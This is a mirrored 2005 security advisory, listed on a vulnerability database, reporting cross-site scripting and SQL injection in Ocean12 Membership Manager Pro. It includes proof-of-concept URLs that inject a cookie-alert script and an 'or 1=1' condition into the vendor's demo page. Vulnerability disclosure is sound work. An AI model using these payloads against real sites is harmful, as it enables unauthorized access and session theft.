Lucene search

K

ocean12_xss_and_sql_inj.txt

🗓️ 17 Apr 2005 00:00:00Reported by ZinhoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Ocean12 Membership Manager Pro has XSS and SQL injection vulnerabilities with a high risk. Vendor not responded to contact

Show more
Code
`Content-type: Multipart/Alternative; boundary="Alt-Boundary-17843.14003556"  
  
--Alt-Boundary-17843.14003556  
Hackers Center Security Group (http://www.hackerscenter.com/)   
Zinho's Security Advisory   
  
  
Title: Ocean12 Membership Manager Pro : XSS and Sql injection  
Risk: High   
Date: 5/04/2005   
Vendor: http://www.ocean12scripts.com  
"A membership manager application designed to allow a website owner   
to easily add password protected areas to their website"  
  
  
xss  
  
http://www.ocean12scripts.com/products/membership/demo/main.asp?  
UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s  
cript%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10  
  
SQL INJECTION  
http://www.ocean12scripts.com/products/membership/demo/main.asp?  
UserID=0 or   
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%  
3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10  
  
  
The vendor has been contacted more than a month ago. No response   
received.  
  
  
Author:   
Zinho is webmaster and founder of http://www.hackerscenter.com ,   
Security research portal   
Secure Web Hosting Companies Reviewed:   
http://www.securityforge.com/web-hosting/secure-web-hosting.asp   
  
zinho-no-spam @ hackerscenter.com   
  
  
====>  
Webmaster of  
.:[ Hackers Center : Internet Security Portal]:.  
http://www.hackerscenter.com  
http://www.securityforge.com/web-hosting  
  
  
  
--Alt-Boundary-17843.14003556  
<?xml version="1.0" ?><html>  
<head>  
<title></title>  
</head>  
<body>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Hackers Center Security Group (</span></font><font face="Arial" color="#0000ff"><span style="font-size:10pt"><u>http://www.hackerscenter.com/</u>)</span></font><font   
face="Arial"><span style="font-size:10pt"> </span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Zinho's Security Advisory </span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Title: Ocean12 Membership Manager Pro : XSS and Sql injection</span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Risk: High </span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Date: 5/04/2005 </span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Vendor: </span></font><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.ocean12scripts.com</u></span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">"A membership manager application designed to allow a website owner   
to easily add password protected areas to their website"</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">xss</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">SQL INJECTION</span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or   
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">The vendor has been contacted more than a month ago. No response   
received.</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"><br/></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Author: </span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Zinho is webmaster and founder of </span></font><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.hackerscenter.com</u></span></font><font   
face="Arial"><span style="font-size:10pt"> ,   
Security research portal </span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Secure Web Hosting Companies Reviewed: </span></font></div>  
<div align="left"><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.securityforge.com/web-hosting/secure-web-hosting.asp</u></span></font><font face="Arial"><span   
style="font-size:10pt"> </span></font></div>  
<div align="left"><br/></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">zinho-no-spam @ hackerscenter.com </span></font></div>  
<div align="left"><br/></div>  
<div align="left"><br/>  
</div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">====></span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">Webmaster of</span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">.:[ Hackers Center : Internet Security Portal]:.</span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.hackerscenter.com</span></font></div>  
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.securityforge.com/web-hosting</span></font></div>  
<div align="left"><br/>  
</div>  
<div align="left"></div>  
</body>  
</html>  
  
--Alt-Boundary-17843.14003556--  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo